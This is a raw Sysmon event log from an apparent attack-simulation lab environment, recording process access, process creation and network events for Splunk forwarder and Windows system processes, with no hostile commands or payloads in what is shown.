08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.898{0C1E0330-F83C-60EB-DD79-00000000D001}868C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.568{0C1E0330-F83C-60EB-DC79-00000000D001}38242424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:23.264{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57458-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.397{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18F89CD580998EF35FCA9C00560194A,SHA256=BEF58958CBF9AB6EA5F75BF8E37AC829CB5F1D934FC8F0961680D26CEACACE00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.318{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.303{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:24.288{0C1E0330-F83C-60EB-DC79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:16.595{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61964-false10.0.1.12-8000- 23542300x80000000000000001054526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:25.552{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128EB9D42E6DDF93C1F0B64740022D1A,SHA256=3DDFF3E8F91D69B0DC619F305D1D35B1244FAF181A12B2E775EC04DB5304077B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.678{0C1E0330-F83D-60EB-DE79-00000000D001}5203900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83D-60EB-DE79-00000000D001}520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:25.537{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 